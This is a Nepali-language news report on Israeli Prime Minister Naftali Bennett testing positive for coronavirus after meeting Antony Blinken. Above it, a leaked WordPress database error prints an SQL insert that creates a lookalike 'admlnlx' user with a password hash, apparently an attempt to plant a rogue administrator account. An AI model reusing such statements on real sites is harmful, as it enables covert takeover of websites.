WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BEpbE9Q185ORO1Umk.N/LdLvnWRm2G/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 09:45:49', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । इजरायलका प्रधानमन्त्री नाफ्ताली बन्नेटलाई कोरोनाभाइरसको सङ्क्रमण भएको छ ।
प्रधानमन्त्रीको कार्यालयले सोमबार दिएको जानकारी अनुसार अमेरिकी विदेशमन्त्री एन्टोनी ब्लिङकनसँगको भेटवार्ता भएलगत्तै उहाँलाई सङ्क्रमण पुष्टि भएको हो ।
“हिस्टोरिक समिट” का क्रममा उहाँहरूका बीचमा आइतबार साइडलाइन भेटवार्ता भएको अधिकारीहरूले जनाएका छन् । समिति इजरायलको जेरुसेलममै भएको थियो ।
उहाँले अस्वस्थ महसुस गरेपछि एकान्तवास मै रहेर आफ्ना काम गरिरहनु भएको र तत्काल अरुसँग भौतिक सम्पर्कमा नरहने निर्णय गर्नु भएको जनाएको छ ।
उहाँ त्यसअघि इजरायलकै उत्तरी सहर हाडेराको भ्रमणमा पनि जानु भएको थियो । त्यहाँ इस्लामी स्टेटका लडाकुहरूको आक्रमणमा परी दुई प्रहरी मारिएका थिए ।
घटनाका बारेमा उहाँले आइतबार राती रक्षा तथा सार्वजनिक सुरक्षा मन्त्री, सेना प्रमुख र अन्य उच्च सरकारी अधिकारीहरूसँग पनि छलफल गरेको थियो । रासस